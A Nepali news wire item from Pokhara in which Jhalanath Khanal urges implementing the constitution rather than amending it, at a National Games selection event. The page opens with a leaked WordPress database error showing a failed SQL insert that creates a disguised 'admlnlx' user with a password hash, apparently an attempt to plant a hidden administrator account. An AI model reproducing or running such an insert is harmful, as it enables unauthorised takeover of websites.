WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUIUvm0AGHPg8mpZv8lOZMEveUjqyC1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 03:20:08', '', 'admlnlx', 'admlnlx')
पोखरा, मंसिर २० – नेकपा ९एमाले०का वरिष्ठ नेता झलनाथ खनालले संविधान संशोधनभन्दा कार्यान्वयन नै अहिलेको मुख्य दायित्व भएको बताउनुभएको छ ।
पूर्वाञ्चलमा आगामी पुस ८ देखि १५ गतेसम्म हुने सातौँ राष्ट्रिय खेलकुदअन्तर्गत पश्चिमाञ्चलस्तरीय खेलाडी छनोट प्रतियोगिताको आज पोखरा रङ्गशालामा उद्घाटन गर्दै उहाँले संविधान संशोधनतिर लाग्यौँ भने देशमा तनाव उत्पन्न हुने र विदेशी हस्तक्षेप बढ्ने विचार व्यक्त गर्नुभयो ।
संविधान कार्यान्वयनमा सबै राजनीतिक दल एकताबद्ध हुन आह्वान गर्दै पूर्वप्रधानमन्त्री खनालले भन्नुभयो “यसमा कसैले खुट्टा कमाउनु हुँदैन, संविधान घोषणा गर्न सक्ने तर कार्यान्वयन गर्न किन नसक्ने रु”
नेता खनालले संविधान चाँडो कार्यान्वयन भयो भने देश आर्थिक समृद्धितर्पm अघि बढ्छ भन्दै उहाँले देश समुन्नत भयो भने खेलकुद क्षेत्रमा धेरै बजेट आउन सक्ने र यस क्षेत्रका पूर्वाधार निर्माणमा सघाउ पुग्ने धारणा राख्नुुभयो । खेलकुद क्षेत्र अभैm सरकारको प्राथमिकतामा पर्न नसकेकामा चिन्ता व्यक्त गर्दै उहाँले यस क्षेत्रमा पर्याप्त साधन स्रोत जुटाइदिन सरकारसँग आग्रह गर्नुभयो ।
पश्चिमाञ्चल क्षेत्रीय खेलकुद विकास समितिका अध्यक्ष खगराज पौडेलको अध्यक्षतामा सो कार्यक्रम भएको थियो । उक्त छनोट प्रतियोगितामा यस क्षेत्रअन्तर्गत १६ जिल्लाका दुई हजार पाँच सय ८८ खेलाडीको सहभागिता छ । – रासस